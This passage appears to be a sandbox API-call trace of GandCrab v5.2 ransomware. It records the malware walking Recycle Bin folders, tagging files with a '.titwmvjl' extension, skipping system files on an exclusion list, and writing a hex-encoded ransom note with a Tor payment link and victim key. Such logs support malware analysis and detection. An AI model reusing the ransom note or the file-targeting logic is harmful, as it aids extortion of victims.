lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x25e0600*=0xd2ca4def, lpMaximumComponentLength=0x25e0608*=0xff, lpFileSystemFlags=0x25e0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0067.461] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\$Recycle.Bin\\S-1-5-18\\d2ca4a09d2ca4deb61a.lock") returned 49 [0067.461] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\$recycle.bin\\s-1-5-18\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x21c [0067.461] VirtualFree (lpAddress=0x25e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.461] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.461] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\") returned 25 [0067.461] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-18\\", lpString2="*" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-18\\*") returned="C:\\$Recycle.Bin\\S-1-5-18\\*" [0067.461] FindFirstFileExW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\*", fInfoLevelId=0x1, lpFindFileData=0x259f7b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f7b8) returned 0x4c9d38 [0067.462] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.462] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0067.462] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.462] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.462] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0067.462] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0067.462] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0067.462] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-18\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-18\\d2ca4a09d2ca4deb61a.lock") returned="C:\\$Recycle.Bin\\S-1-5-18\\d2ca4a09d2ca4deb61a.lock" [0067.462] lstrlenW (lpString=".titwmvjl") returned 9 [0067.462] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\d2ca4a09d2ca4deb61a.lock") returned 49 [0067.462] VirtualAlloc (lpAddress=0x0, dwSize=0xa2, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.462] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\$Recycle.Bin\\S-1-5-18\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 58 [0067.462] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\d2ca4a09d2ca4deb61a.lock") returned 49 [0067.462] lstrlenW (lpString=".lock") returned 5 [0067.462] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x25e0000 [0067.463] wsprintfW (in: param_1=0x25e0000, param_2="%ws " | out: param_1=".lock ") returned 6 [0067.463] VirtualFree (lpAddress=0x25e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.463] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.463] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0067.463] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0067.463] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0067.463] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-18\\", lpString2="desktop.ini" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" [0067.463] lstrlenW (lpString=".titwmvjl") returned 9 [0067.463] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0067.463] VirtualAlloc (lpAddress=0x0, dwSize=0x88, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.463] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini.titwmvjl") returned 45 [0067.463] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0067.463] lstrlenW (lpString=".ini") returned 4 [0067.463] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x25e0000 [0067.464] wsprintfW (in: param_1=0x25e0000, param_2="%ws " | out: param_1=".ini ") returned 5 [0067.464] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0067.464] VirtualFree (lpAddress=0x25e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.464] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0067.464] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 36 [0067.464] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0067.464] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.464] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0067.464] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0067.464] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0067.464] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-18\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-18\\TITWMVJL-DECRYPT.txt") returned="C:\\$Recycle.Bin\\S-1-5-18\\TITWMVJL-DECRYPT.txt" [0067.464] lstrlenW (lpString=".titwmvjl") returned 9 [0067.464] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\TITWMVJL-DECRYPT.txt") returned 45 [0067.464] VirtualAlloc (lpAddress=0x0, dwSize=0x9a, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.464] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\$Recycle.Bin\\S-1-5-18\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 54 [0067.464] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\TITWMVJL-DECRYPT.txt") returned 45 [0067.464] lstrlenW (lpString=".txt") returned 4 [0067.464] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x25e0000 [0067.465] wsprintfW (in: param_1=0x25e0000, param_2="%ws " | out: param_1=".txt ") returned 5 [0067.465] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0067.465] VirtualFree (lpAddress=0x25e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.465] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\TITWMVJL-DECRYPT.txt") returned 45 [0067.465] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-18\\TITWMVJL-DECRYPT.txt") returned 45 [0067.465] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0067.465] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0067.465] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0067.465] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0067.465] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0067.465] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0067.465] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0067.465] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0067.465] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.465] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 0 [0067.465] FindClose (in: hFindFile=0x4c9d38 | out: hFindFile=0x4c9d38) returned 1 [0067.465] CloseHandle (hObject=0x21c) returned 1 [0067.465] FindNextFileW (in: hFindFile=0x4c9c78, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.465] lstrcmpW (lpString1="S-1-5-21-1462094071-1423818996-289466292-1000", lpString2=".") returned 1 [0067.466] lstrcmpW (lpString1="S-1-5-21-1462094071-1423818996-289466292-1000", lpString2="..") returned 1 [0067.466] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\", lpString2="S-1-5-21-1462094071-1423818996-289466292-1000" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000") returned="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000" [0067.466] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000", lpString2="\\" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\") returned="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\" [0067.466] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0067.466] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.466] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0067.466] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.466] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0067.466] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.466] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0067.466] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.467] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0067.467] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.467] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.467] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\\\TITWMVJL-DECRYPT.txt") returned 83 [0067.467] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1462094071-1423818996-289466292-1000\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\$recycle.bin\\s-1-5-21-1462094071-1423818996-289466292-1000\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0067.468] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c